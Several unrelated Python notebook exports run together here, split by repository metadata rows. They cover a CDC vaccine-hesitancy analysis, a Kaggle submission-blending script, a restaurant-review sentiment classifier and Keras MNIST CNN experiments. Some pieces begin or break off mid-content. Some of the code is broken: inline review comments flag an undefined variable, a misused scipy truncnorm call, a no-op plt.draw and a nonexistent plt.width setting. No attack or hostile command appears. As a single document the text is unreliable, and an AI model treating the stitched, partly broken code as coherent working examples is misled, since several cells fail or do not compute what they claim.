#Data extracted from https://data.cdc.gov/Vaccinations/Fully-Vaccinated-Adults/jm79-dz78
#Dataset of Vaccine Hesitancy Rates in the United States
url="https://data.cdc.gov/api/views/q9mh-h2tw/rows.csv?accessType=DOWNLOAD&bom=true&format=true"
# Download the CDC vaccine-hesitancy CSV and parse it straight from memory.
s=requests.get(url).content
df=pd.read_csv(io.StringIO(s.decode('utf-8')))
print(df)
# +
#Data Cleanup
# Build one row per state, holding the mean of each hesitancy / vaccination /
# demographic column across that state's county-level rows.
states = df['State'].unique()
print(states)
per_state = pd.DataFrame(states)
per_state['Estimated hesitant'] = 0.0
per_state['Estimated hesitant or unsure'] = 0.0
per_state['Estimated strongly hesitant'] = 0.0
per_state['Percent adults fully vaccinated against COVID-19'] = 0.0
per_state['Percent Hispanic']=0.0
per_state['Percent non-Hispanic American Indian/Alaska Native']=0.0
per_state['Percent non-Hispanic Asian']=0.0
per_state['Percent non-Hispanic Black']=0.0
per_state['Percent non-Hispanic Native Hawaiian/Pacific Islander']=0.0
per_state['Percent non-Hispanic White']=0.0
# NOTE(review): the chained indexing below (per_state['col'][i] = ...) is the
# pandas SettingWithCopy pattern (the warning is globally suppressed above).
# df.groupby('State')[cols].mean() would do the same job in one call -
# confirm before refactoring.
for i in range(len(states)):
    per_state['Estimated hesitant'][i] = df.loc[df['State'] == per_state[0][i], 'Estimated hesitant'].mean()
    per_state['Estimated hesitant or unsure'][i] = df.loc[df['State'] == per_state[0][i], 'Estimated hesitant or unsure'].mean()
    per_state['Estimated strongly hesitant'][i] = df.loc[df['State'] == per_state[0][i], 'Estimated strongly hesitant'].mean()
    per_state['Percent adults fully vaccinated against COVID-19'][i] = df.loc[df['State'] == per_state[0][i], 'Percent adults fully vaccinated against COVID-19'].mean()
    per_state['Percent Hispanic'][i] = df.loc[df['State'] == per_state[0][i], 'Percent Hispanic'].mean()
    per_state['Percent non-Hispanic American Indian/Alaska Native'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic American Indian/Alaska Native'].mean()
    per_state['Percent non-Hispanic Asian'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic Asian'].mean()
    per_state['Percent non-Hispanic Black'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic Black'].mean()
    per_state['Percent non-Hispanic Native Hawaiian/Pacific Islander'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic Native Hawaiian/Pacific Islander'].mean()
    per_state['Percent non-Hispanic White'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic White'].mean()
# Shorten the verbose CDC column names.
rename = {'Estimated hesitant': "Hesitant", 'Estimated hesitant or unsure' : "Unsure",'Estimated strongly hesitant' : "Strongly Hesitant" ,
          'Percent adults fully vaccinated against COVID-19': "Fully Vaccinated" ,'Percent Hispanic': 'Hispanic', 'Percent non-Hispanic American Indian/Alaska Native': 'American Indian/Alaskan Native',
          'Percent non-Hispanic Asian':'Asian', 'Percent non-Hispanic Black': 'Black', 'Percent non-Hispanic Native Hawaiian/Pacific Islander': "Hawaiian/Pacific Islander",
          'Percent non-Hispanic White': 'White' }
per_state.rename(columns = rename, inplace = True)
print(per_state)
# +
#Data Visualization
#Which states have the highest and lowest average rates of vaccination?
# Sort states by mean fully-vaccinated percentage (dropping states with no
# data) and show the ten highest and ten lowest.
vax= per_state.sort_values('Fully Vaccinated', ascending=False).dropna(subset = ['Fully Vaccinated'])
most_vaccinated = vax.head(10)
least_vaccinated = vax.tail(10)
print(most_vaccinated)
print(least_vaccinated)
# +
# Bar chart of the average fully-vaccinated percentage for every state.
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.bar(vax[0],vax['Fully Vaccinated'])
plt.xticks(vax[0], rotation='vertical')
# NOTE(review): plt.width is not a matplotlib API - this just sets an unused
# attribute on the pyplot module; bar width belongs in the ax.bar() call.
plt.width=4
plt.ylabel('Average Percentages')
plt.xlabel ('State')
plt.title('Average Fully Vaccinated Individuals by State')
from matplotlib import rcParams
#customize graph
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Verdana']
rcParams['font.size'] = 6
plt.show()
# +
#What states have the highest and lowest average rate of strongly hesitant people?
opposed= per_state.sort_values('Strongly Hesitant', ascending=False).dropna(subset = ['Strongly Hesitant'])
high_opposed = opposed.head(10)
low_opposed = opposed.tail(10)
print(high_opposed)
print(low_opposed)
#Trends: 1. the states with the lowest rates of vaccination do not necessarily match to those with the highest opposition
# 2. The states with the highest vaccination rates are mostly in the Northeast part of America
# 3. The states with lowest vaccination rates are mostly located in the Southeast part of the country.
# -
# Stacked horizontal bar chart of all vaccine-status columns per state.
per_state.plot(kind="barh", stacked = True)
plt.legend(bbox_to_anchor=(1.05,1))
# NOTE(review): missing parentheses - this references plt.draw without
# calling it, so the line is a no-op.
plt.draw
plt.yticks(np.arange(len(per_state[0])), per_state[0], rotation = 0)
plt.xlabel('Average Percentages')
plt.ylabel ('State')
plt.title("View of Vaccine Status in All States")
# +
# I expected to see that this would be consistent with the highest and lowest states with fully vaccinated individuals
# but was surprised to see that the states with the lowest rates of vaccination are not the same as those with the
# highest amount of vaccine hesitancy. This leads me to believe that there is more involved with the low rates of
# fully vaccinated individuals in some states, perhaps vaccine availability is an issue.
# +
#Of the fully vaccinated in the highest vaccinated state (Connecticut) vs the lowest vaccinated state (Georgia), is there some racial disparity?
# 'No Info' is whatever population share the listed race/ethnicity columns do
# not account for.
per_state ['No Info']=per_state[['Hispanic', 'American Indian/Alaskan Native', 'Asian', 'Black', 'Hawaiian/Pacific Islander', 'White']].apply(lambda x: 1 - x.sum(), axis = 1)
#print(per_state['No Info'])
labels = ['Hispanic', 'American Indian/Alaskan Native', 'Asian', 'Black', 'Hawaiian/Pacific Islander', 'White', 'No Info']
# NOTE(review): rows 38 and 6 are assumed to be Connecticut and Georgia -
# verify the row ordering of per_state before trusting these titles.
t_sizes = per_state.loc[38,['Hispanic', 'American Indian/Alaskan Native', 'Asian', 'Black', 'Hawaiian/Pacific Islander', 'White', 'No Info']]
b_sizes = per_state.loc[6,['Hispanic', 'American Indian/Alaskan Native', 'Asian', 'Black', 'Hawaiian/Pacific Islander', 'White', 'No Info']]
fig1, ax1 = plt.subplots()
ax1.pie(t_sizes, labels=labels, autopct='%1.1f%%',
        shadow=True, startangle=90)
ax1.axis('equal')
plt.title('Connecticut')
fig2, ax2 = plt.subplots()
ax2.pie(b_sizes, labels=labels, autopct='%1.1f%%',
        shadow=True, startangle=90)
ax2.axis('equal')
plt.title('Georgia')
| 6,741 |
/Trunc norm mean .ipynb
|
d616936fe5879ac1a25571c81e47ad7b3a203fdc
|
[] |
no_license
|
mukeshpilaniya/kaggle
|
https://github.com/mukeshpilaniya/kaggle
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 294,034 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] toc=true
# <h1>Table of Contents<span class="tocSkip"></span></h1>
# <div class="toc"><ul class="toc-item"></ul></div>
# -
# %matplotlib inline
# %load_ext autoreload
# %autoreload 4
# %autosave 120
from fastai.io import *
from fastai.structured import *
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier
from pandas_summary import DataFrameSummary
from IPython.display import display
from sklearn import metrics
import feather
import lightgbm as lgb
from sklearn.model_selection import StratifiedKFold, RepeatedKFold
from sklearn.metrics import mean_squared_error
import warnings
import gc
PATH = './'
# !ls
# Public-leaderboard scores of previous submission files, kept for reference.
# FIX: these were bare `'file.csv' - score` expressions, which raise
# TypeError (str minus float) when the script is executed; they are preserved
# here as comments so the file can run.
# 'combined_submission-2019-02-26 22:47:23.452323.csv' - 3.684
# 'dl_xgb_submission_stacked_lgb-2019-02-26 22:45:24.597929.csv' - 3.687
# 'combined_submission-2019-02-22 21:40:05.269919.csv' - 3.685
# 'dl_submission_stacked_lgb-2019-02-22 21:37:59.515079.csv' - 3.685
# 'dl_submission-2019-02-22 21:30:24.851272.csv' - 3.745
# 'outlier_combining_submission-2019-02-19 02:48:44.830259.csv'- 3.690
# 'outlier_combining_submission-2019-02-19 02:28:13.811057.csv' - 3.689
# 'submission-2019-02-19 00:51:48.972772.csv' - 3.717
# 'blend_kfol_st.csv' - 3.693
# 'submission-2019-02-13 22:48:45.005871.csv' - 3.691
# 'submission-2019-01-12 13:53:27.215115.csv'- 3.696
# 'submission-2019-01-17 23:23:57.743505.csv' - 3.696
# 'submission-2019-01-20 19:35:24.892043.csv' - 3.695
# 'chandu_mean1.csv' - 3.694
# 'submission-2019-02-02 23:13:59.670630.csv' - 3.693
# 'submission-2019-02-13 00:42:12.274968.csv' - 3.692
# 'submission_kfold-2019-02-13 00:55:25.132146.csv' - 3.692
# 'submission-2019-02-15 14:22:06.881490.csv' - 3.695
# 'outlier_combining_submission-2019-02-19 02:12:16.662625.csv' - 3.689
# 'combined_submission-2019-02-20 00:21:17.597315.csv'- 3.686
# 'xg_submission_stacked_lgb-2019-02-21 13:41:48.181414.csv' - 3.688
# 'combined_submission-2019-02-21 13:55:21.772806.csv' - 3.684
# 'combined_submission-2019-02-22 20:49:55.088273.csv' - 3.684
# Load every previous submission, renaming each prediction column after the
# file's public-LB score and timestamp so they can be merged side by side.
# NOTE(review): three of the renamed columns ('3_690_830259', '3_696_215115',
# '3_686_597315') lack the 'df_' prefix used by all the others.
df_3_684_452323 = pd.read_csv('combined_submission-2019-02-26 22:47:23.452323.csv', names=['card_id', 'df_3_684_452323'], skiprows=[0], header=None)
df_3_687_597929 = pd.read_csv('dl_xgb_submission_stacked_lgb-2019-02-26 22:45:24.597929.csv', names=['card_id', 'df_3_687_597929'], skiprows=[0], header=None)
df_3_685_269919 = pd.read_csv('combined_submission-2019-02-22 21:40:05.269919.csv', names=['card_id', 'df_3_685_269919'], skiprows=[0], header=None)
df_3_685_515079 = pd.read_csv('dl_submission_stacked_lgb-2019-02-22 21:37:59.515079.csv', names=['card_id', 'df_3_685_515079'], skiprows=[0], header=None)
df_3_745_851272 = pd.read_csv('dl_submission-2019-02-22 21:30:24.851272.csv', names=['card_id', 'df_3_745_851272'], skiprows=[0], header=None)
df_3_690_830259 = pd.read_csv('outlier_combining_submission-2019-02-19 02:48:44.830259.csv', names=['card_id', '3_690_830259'], skiprows=[0], header=None)
df_3_689_811057 = pd.read_csv('outlier_combining_submission-2019-02-19 02:28:13.811057.csv', names=['card_id', 'df_3_689_811057'], skiprows=[0], header=None)
df_3_717_972772 = pd.read_csv('submission-2019-02-19 00:51:48.972772.csv', names=['card_id', 'df_3_717_972772'], skiprows=[0], header=None)
df_3_693_blend_kfol_st = pd.read_csv('blend_kfol_st.csv', names=['card_id', 'df_3_693_blend_kfol_st'], skiprows=[0], header=None)
df_3_691_005871 = pd.read_csv('submission-2019-02-13 22:48:45.005871.csv', names=['card_id', 'df_3_691_005871'], skiprows=[0], header=None)
df_3_696_215115 = pd.read_csv('submission-2019-01-12 13:53:27.215115.csv', names=['card_id', '3_696_215115'], skiprows=[0], header=None)
df_3_696_743505 = pd.read_csv('submission-2019-01-17 23:23:57.743505.csv', names=['card_id', 'df_3_696_743505'], skiprows=[0], header=None)
df_3_695_892043 = pd.read_csv('submission-2019-01-20 19:35:24.892043.csv', names=['card_id', 'df_3_695_892043'], skiprows=[0], header=None)
df_3_694_chandu_mean1 = pd.read_csv('chandu_mean1.csv', names=['card_id', 'df_3_694_chandu_mean1'], skiprows=[0], header=None)
df_3_693_670630 = pd.read_csv('submission-2019-02-02 23:13:59.670630.csv', names=['card_id', 'df_3_693_670630'], skiprows=[0], header=None)
df_3_692_274968 = pd.read_csv('submission-2019-02-13 00:42:12.274968.csv', names=['card_id', 'df_3_692_274968'], skiprows=[0], header=None)
df_3_692_132146 = pd.read_csv('submission_kfold-2019-02-13 00:55:25.132146.csv', names=['card_id', 'df_3_692_132146'], skiprows=[0], header=None)
df_3_695_881490 = pd.read_csv('submission-2019-02-15 14:22:06.881490.csv', names=['card_id', 'df_3_695_881490'], skiprows=[0], header=None)
df_3_689_662625 = pd.read_csv('outlier_combining_submission-2019-02-19 02:12:16.662625.csv', names=['card_id', 'df_3_689_662625'], skiprows=[0], header=None)
df_3_686_597315 = pd.read_csv('combined_submission-2019-02-20 00:21:17.597315.csv', names=['card_id', '3_686_597315'], skiprows=[0], header=None)
df_3_688_181414 = pd.read_csv('xg_submission_stacked_lgb-2019-02-21 13:41:48.181414.csv', names=['card_id', 'df_3_688_181414'], skiprows=[0], header=None)
df_3_684_772806 = pd.read_csv('combined_submission-2019-02-21 13:55:21.772806.csv', names=['card_id', 'df_3_684_772806'], skiprows=[0], header=None)
df_3_684_088273 = pd.read_csv('combined_submission-2019-02-22 20:49:55.088273.csv', names=['card_id', 'df_3_684_088273'], skiprows=[0], header=None)
# Inner-join all selected submissions on card_id.  The commented-out merges
# are files deliberately excluded from the blend (the weakest scores and
# near-duplicates).
df_base = df_3_684_088273
df_base = pd.merge(df_base, df_3_684_452323, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_687_597929, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_685_269919, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_685_515079, how='inner', on='card_id')
# df_base = pd.merge(df_base, df_3_745_851272, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_690_830259, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_689_811057, how='inner', on='card_id')
# df_base = pd.merge(df_base, df_3_717_972772, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_693_blend_kfol_st, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_691_005871, how='inner', on='card_id')
# df_base = pd.merge(df_base, df_3_696_215115, how='inner', on='card_id')
# df_base = pd.merge(df_base, df_3_696_743505, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_695_892043, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_694_chandu_mean1, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_693_670630, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_692_274968, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_692_132146, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_695_881490, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_689_662625, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_686_597315, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_688_181414, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_684_772806, how='inner', on='card_id')
# Correlation heatmap across all loaded prediction columns (skipping card_id).
plt.figure(figsize=(16,12))
sns.heatmap(df_base.iloc[:,1:].corr(),annot=True,fmt=".2f")
# Pairwise RMSE matrix between every pair of prediction columns.
M = np.zeros([df_base.iloc[:,1:].shape[1],df_base.iloc[:,1:].shape[1]])
for i in np.arange(M.shape[1]):
    for j in np.arange(M.shape[1]):
        M[i,j] = np.sqrt(metrics.mean_squared_error(df_base.iloc[:,i+1], df_base.iloc[:,j+1]))
# Blend: simple row-wise mean of all prediction columns.
df_base['target'] = df_base.iloc[:,1:].mean(axis=1)
gc.collect()
# +
# df_base['target'] = df_3_745_851272['df_3_745_851272']* 0.1 + df_base['target'] * 0.9
# -
# Write the blended predictions and submit them to the Kaggle competition.
df_base[['card_id','target']].to_csv("mean_of_all_final.csv",index=False)
# !kaggle competitions submit elo-merchant-category-recommendation -f 'mean_of_all_final.csv' -m "blending top 14 submissions"
# +
# Weighted blend: mix 10% of the deep-learning submission into the mean
# blend, then compare the two distributions with side-by-side box plots.
df_base['target'] = df_3_745_851272['df_3_745_851272']* 0.1 + df_base['target'] * 0.9
plt.figure(figsize=(8,8))
plt.subplot(1, 2, 1)
sns.boxplot(df_3_745_851272['df_3_745_851272'],orient='v')
plt.subplot(1, 2, 2)
sns.boxplot(df_base['target'], orient='v')
plt.show()
# df_base[['card_id','target']].to_csv("blend3.csv",index=False)
# -
# Exploratory (and broken) attempt at a truncated-normal blend.
from scipy.stats import truncnorm
df_base.shape, df_3_684_088273.shape
df_base.head()
df_base1 = df_base[['card_id', 'target']]
df_base1.shape, df_3_684_088273.shape
# NOTE(review): scipy's truncnorm.mean expects scalar clip bounds (a, b);
# calling it with no arguments, or with whole prediction columns as below,
# does not compute a per-row blend - this cell does not do what its name
# suggests and will raise/misbehave.
truncnorm.mean()
df_3_687_597929['df_3_687_597929'].head()
len(df_3_684_088273['df_3_684_088273'].values.tolist())
len(df_3_687_597929['df_3_687_597929'].values.tolist())
truncnorm.mean(df_3_684_088273['df_3_684_088273'].values.tolist(), df_3_687_597929['df_3_687_597929'].values.tolist())
# NOTE(review): df_base3 is never defined - this line raises NameError as
# written (probably meant df_base1 or df_base).
df_base3['target'] = truncnorm.mean(df_3_684_088273['df_3_684_088273'],df_base1['target'])
df_base[['card_id','target']].to_csv("blend3_truncnorm.csv",index=False)
| 8,893 |
/Natural Language Processing.ipynb
|
2aa5432bd7eabf162ba5c80076ce5e7f8abcc705
|
[] |
no_license
|
alamin19/Natural-Language-Processing
|
https://github.com/alamin19/Natural-Language-Processing
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 8,368 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Restaurant reviews: tab-separated; quoting=3 (QUOTE_NONE) keeps embedded
# double quotes in the review text verbatim.
dataset = pd.read_csv('Restaurant_Reviews.tsv', delimiter = '\t', quoting = 3)
dataset.shape
dataset['Review'][0]
#cleaning text
# Normalise each review: keep letters only, lower-case, drop English
# stopwords, and reduce every word to its Porter stem.
import re
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer

# Hoisted out of the loop: the stemmer is stateless and the stopword set is
# constant, so building them once avoids re-reading the stopword list and
# re-instantiating the stemmer for every one of the 1000 reviews.
ps = PorterStemmer()
stop_words = set(stopwords.words('english'))
corpus = []
for i in range(0, 1000):
    # strip everything that is not a letter, then tokenise on whitespace
    review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][i])
    review = review.lower().split()
    review = [ps.stem(word) for word in review if word not in stop_words]
    corpus.append(' '.join(review))
#Creating bag of word model
# Keep only the 1500 most frequent tokens; X is the dense document-term
# count matrix and y the sentiment label (column 1 of the TSV).
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(max_features = 1500)
X = cv.fit_transform(corpus).toarray()
y = dataset.iloc[:, 1].values
X,y
# +
# splitting the dataset into training and test set
# FIX: sklearn.cross_validation was removed in scikit-learn 0.20; the
# function now lives in sklearn.model_selection (same signature).
from sklearn.model_selection import train_test_split
X_train,X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
#Fitting Naive Bayes model into the Training and Test set
from sklearn.naive_bayes import GaussianNB
classifier = GaussianNB()
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
# Confusion matrix of predicted vs actual sentiment on the held-out 20%.
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# -
cm
padding and dropout)
# - ploting loss with each epoch of model
# - Overall Summary (Conclusion) .
# <hr>
# + [markdown] colab_type="text" id="xQkqyk1fTioQ"
# <div style="text-align:center"><span style="color:green; font-family:Georgia; font-size:2em;">Applying Various CNN Networks on MNIST Dataset </span><div>
# + [markdown] colab_type="text" id="x_eYSLk-7Ra0"
# ### Model 1 : 2 Layer Architecture + kernel (3, 3) + relu + Adadelta + MaxPooling(2, 2) + Dropout(0.25)
# + colab={"base_uri": "https://localhost:8080/", "height": 68} colab_type="code" id="lZkWneXnTc1I" outputId="85e7cee1-2f5e-4c40-a907-d686a8913472"
# Credits: https://github.com/keras-team/keras/blob/master/examples/mnist_cnn.py
import warnings
warnings.filterwarnings("ignore")
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Activation
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
import seaborn as sns
from keras import regularizers
# Training hyper-parameters for the MNIST CNN experiments.
batch_size = 128
num_classes = 10
epochs = 12
# input image dimensions
img_rows, img_cols = 28, 28
# the data, split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Keras backends differ on whether the channel axis comes first or last;
# reshape the 28x28 greyscale images to match the active backend.
if K.image_data_format() == 'channels_first':
    x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
    x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
    input_shape = (1, img_rows, img_cols)
else:
    x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
    x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
    input_shape = (img_rows, img_cols, 1)
# Scale pixel values from 0-255 integers to 0-1 floats.
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# + colab={"base_uri": "https://localhost:8080/", "height": 649} colab_type="code" id="sTHpBLEM6t1B" outputId="ba386ffa-4fac-458b-d007-aef2c6110e23"
# Model 1 : 2 Layer Architecture + kernel (3, 3) + relu + Adadelta + MaxPooling(2, 2) + Dropout(0.25)
model = Sequential()
# L2 weight decay is applied to the first conv layer only.
model.add(Conv2D(32, kernel_size=(3, 3),kernel_regularizer=regularizers.l2(0.01),activation='relu',input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,optimizer=keras.optimizers.Adadelta(),metrics=['accuracy'])
history = model.fit(x_train, y_train,batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(x_test, y_test))
# Report loss/accuracy on both splits to expose over/under-fitting.
score = model.evaluate(x_test, y_test, verbose=1)
score_train = model.evaluate(x_train, y_train, verbose=1)
print('train loss', score_train[0])
print('train accuracy:', score_train[1])
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="2GBW72emXa8s" outputId="b9701102-98ff-4c50-b7ab-b526230e3302"
# %matplotlib notebook
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import time
# https://gist.github.com/greydanus/f6eee59eaf1d90fcb3b534a25362cea4
# https://stackoverflow.com/a/14434334
# This function is used to update the plots for each epoch and error
def plt_dynamic(x, vy, ty, ax, colors=('b',)):
    """Plot train vs. validation loss curves on *ax* and redraw its figure.

    Parameters
    ----------
    x : sequence of epoch numbers (shared x-axis for both curves).
    vy : per-epoch validation-loss values.
    ty : per-epoch training-loss values.
    ax : matplotlib Axes to draw on.
    colors : unused; kept (as an immutable default instead of the
        original mutable list default) for backward compatibility.
    """
    ax.plot(x, vy, 'b', label="Validation Loss")
    ax.plot(x, ty, 'r', label="Train Loss")
    # BUG FIX: operate on the Axes we were given instead of pyplot's
    # "current" axes and the module-global `fig` (the original raised
    # NameError if no `fig` existed yet, and legended whichever figure
    # happened to be active).
    ax.legend()
    ax.grid(True)
    ax.figure.canvas.draw()
# ploting loss with epoch of model
# Train vs. validation loss per epoch for Model 1, drawn with the
# `plt_dynamic` helper defined above.
fig,ax = plt.subplots(1,1)
ax.set_xlabel('epoch') ; ax.set_ylabel('Categorical Crossentropy Loss')
# list of epoch numbers
x = list(range(1,epochs+1))
vy = history.history['val_loss']
ty = history.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="j7DS3vh7U1n2"
# ### Model_2 : 3Layer Architecture + kernel (5, 5) + relu + Adadelta + MaxPooling(2, 2) + Dropout(0.25)
# + colab={"base_uri": "https://localhost:8080/", "height": 527} colab_type="code" id="sKnPR4uXU0T-" outputId="42f512b4-4fc1-48cd-a39b-f48c6f479792"
# Model_2 : 3Layer Architecture + kernel (5, 5) + relu + Adadelta + MaxPooling(2, 2) + Dropout(0.25)
# %%time
# Three 5x5 conv layers (32/64/128 filters, all with L2 weight decay),
# two pooling+dropout stages, then a 254-unit dense head.
model_2 = Sequential()
model_2.add(Conv2D(32, kernel_size=(5, 5), kernel_regularizer=regularizers.l2(0.01), activation='relu', input_shape=input_shape))
model_2.add(Conv2D(64, (5, 5), activation='relu', kernel_regularizer=regularizers.l2(0.01),))
model_2.add(MaxPooling2D(pool_size=(2, 2)))
model_2.add(Dropout(0.25))
model_2.add(Conv2D(128, (5, 5), activation='relu', kernel_regularizer=regularizers.l2(0.01),))
model_2.add(MaxPooling2D(pool_size=(2, 2)))
model_2.add(Dropout(0.25))
model_2.add(Flatten())
model_2.add(Dense(254, activation='relu'))
model_2.add(Dropout(0.5))
model_2.add(Dense(num_classes, activation='softmax'))
model_2.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy'])
history_2 = model_2.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test))
score_2 = model_2.evaluate(x_test, y_test, verbose=1)
print('Test loss:', score_2[0])
print('Test accuracy:', score_2[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 283} colab_type="code" id="bOVxhj1WU2LL" outputId="f8ca6b5d-d09f-4df8-a42c-95949517f1fe"
# ploting loss with each epoch of model2
# Same loss-curve plot as above, for Model 2.
fig, ax=plt.subplots(1,1)
ax.set_xlabel('epoch'); ax.set_ylabel('Categorical Crossentropy Loss')
x = list(range(1,epochs+1)) # List of epoch Numbers
vy = history_2.history['val_loss']
ty = history_2.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="Hk1Kh_nQee7v"
# ### Model_3: 3Layer Architecture + kernel (7, 7) + relu + Adam + MaxPooling(2, 2) + padding(same) + with out Dropout
# + colab={"base_uri": "https://localhost:8080/", "height": 493} colab_type="code" id="sT_sqZ3Me7W3" outputId="8984e701-874b-484c-90c0-ba54fadcc684"
# Model_3: 3Layer Architecture + kernel (7, 7) + relu + Adam + MaxPooling(2, 2) + padding(same) + with out Dropout
# %%time
# Three 7x7 conv layers (32/64/128); only the first uses 'same' padding
# and L2 weight decay.  No dropout, Adam optimizer.
model_3 = Sequential()
model_3.add(Conv2D(32, kernel_size=(7, 7), padding='same', kernel_regularizer=regularizers.l2(0.01), activation='relu', input_shape=input_shape))
model_3.add(MaxPooling2D(pool_size=(2, 2)))
model_3.add(Conv2D(64, kernel_size=(7,7), activation='relu'))
model_3.add(Conv2D(128, kernel_size=(7, 7), activation='relu'))
model_3.add(MaxPooling2D(pool_size=(2,2)))
model_3.add(Flatten())
model_3.add(Dense(254, activation='relu'))
model_3.add(Dense(num_classes, activation='softmax'))
model_3.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
history_3 = model_3.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test))
score_3 = model_3.evaluate(x_test, y_test, verbose=1)
print('Test loss:', score_3[0])
print('Test accuracy:', score_3[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="jV_A3zhJe9MD" outputId="70744cce-272e-469f-fba2-e06c51e4f1ca"
# ploting loss with each epoch of mode3
# Loss curves for Model 3.
fig, ax=plt.subplots(1,1)
ax.set_xlabel('epoch'); ax.set_ylabel('Categorical Crossentropy Loss')
x = list(range(1,epochs+1)) # List of epoch Numbers
vy = history_3.history['val_loss']
ty = history_3.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="h5PAFlN5e_7o"
# ### Model E1(Experiment1) = 3Layer Architecture + kernel (9, 9) + relu + adam + L2 reg + MaxPooling + padding(same) + Dropout(0.3)
# + colab={"base_uri": "https://localhost:8080/", "height": 595} colab_type="code" id="4aMEkkAuRKv3" outputId="0b851950-a596-4a5e-ad45-5cc49d83e6f8"
# Model E1(Experiment1) = 3Layer Architecture + kernel (9, 9) + relu + adam + L2 reg + MaxPooling + padding(same) + Dropout(0.3
# %%time
# New hyper-parameters shared by experiments E1-E4 below.
batch_size_E = 150
num_classes_E = 10
epochs_E = 15
# Three 9x9 'same'-padded conv layers (32/64/128), pooling + dropout
# after the first two, 254-unit dense head, Adam optimizer.
model_E1 = Sequential()
model_E1.add(Conv2D(32, kernel_size=(9, 9), padding='same', kernel_regularizer=regularizers.l2(0.01), activation='relu', input_shape=input_shape))
model_E1.add(MaxPooling2D(pool_size=(2, 2)))
model_E1.add(Dropout(0.3))
model_E1.add(Conv2D(64, kernel_size=(9,9), padding='same', activation='relu'))
model_E1.add(MaxPooling2D(pool_size=(2, 2)))
model_E1.add(Dropout(0.3))
model_E1.add(Conv2D(128, kernel_size=(9, 9), padding='same', activation='relu'))
model_E1.add(MaxPooling2D(pool_size=(2,2)))
model_E1.add(Flatten())
model_E1.add(Dense(254, activation='relu'))
model_E1.add(Dense(num_classes_E, activation='softmax'))
model_E1.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
history = model_E1.fit(x_train, y_train, batch_size=batch_size_E, epochs=epochs_E, verbose=1, validation_data=(x_test, y_test))
